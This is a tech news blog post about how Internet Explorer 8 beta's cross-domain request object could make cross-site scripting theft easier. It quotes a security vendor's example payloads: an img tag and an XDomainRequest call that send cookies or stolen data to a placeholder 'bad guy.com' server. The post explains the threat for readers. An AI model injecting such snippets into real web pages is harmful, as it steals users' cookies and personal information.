IE 8: Cross scripting defense a double-edged sword

Summary:Update: As most of the tech world knows, IE 8 has landed with its first beta, but the security improvements may raise some other issues to ponder.Folks--especially security researchers--are kicking the tires on IE 8 (all resources) and finding a few problems that go along with Microsoft's protection enhancements.

Update: As most of the tech world knows, IE 8 has landed with its first beta, but the security improvements may raise some other issues to ponder.

Folks--especially security researchers--are kicking the tires on IE 8 (all resources) and finding a few problems that go along with Microsoft's protection enhancements.

For instance, Websense hones in on IE 8's cross domain request restrictions. Frankly, Websense's post is a bit over my head, but the money excerpt is notable.

Because Internet Explorer 8 allows cross domain requests, malicious attackers can use content injection holes in Web sites a lot more efficiently. Typically, when a site is vulnerable to XSS (cross-site scripting), an attacker will inject content to steal user information and relay it back as follows:

<imgsrc="http://bad guy.com/steal.php?cookie=" + cookie />

The <img> tag is used because it is one of the few things allowed to communicate externally. With the new XDR object, the attacker can simply insert script code that communicates directly to a malicious server:

var xdr = new XDomainRequest(); xdr.open("POST", "http://www.bad guy.com/"); xdr.send(stolenInfo);

With direct communication, it is foreseeable that injection payloads will evolve in complexity and features. Malicious frameworks can be built so that the client is constantly communicating with the malicious server to determine what actions to take next. Stealing user information is just the start of what can be achieved with new emerging technologies such as these.

This statement on IE 8 just illustrates the security arms race. Vendors race to patch, protect and enhance their software to lock out threats. But those threats just keep evolving. By time IE 8 clears its beta hurdles there will be new threats to take advantage of whatever scheme Microsoft has cooked up.

Update: Tweaked the headline. Websense got back to me with the following clarification. In a nutshell, I goofed. Websense clarifies:

The new ability of cross-domain requests does not really increase the attack surface, but simply provides an additional, easier means to communicate externally. As you can see this provides benefits not only to developers but to malicious folks as well.

Topics: Security, Browser, Microsoft

About

Larry Dignan is Editor in Chief of ZDNet and SmartPlanet as well as Editorial Director of ZDNet's sister site TechRepublic. He was most recently Executive Editor of News and Blogs at ZDNet. Prior to that he was executive news editor at eWeek and news editor at Baseline. He also served as the East Coast news editor and finance editor at CN... Full Bio

zdnet_core.socialButton.googleLabel Contact Disclosure

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Related Stories

The best of ZDNet, delivered

You have been successfully signed up. To sign up for more newsletters or to manage your account, visit the Newsletter Subscription Center.
Subscription failed.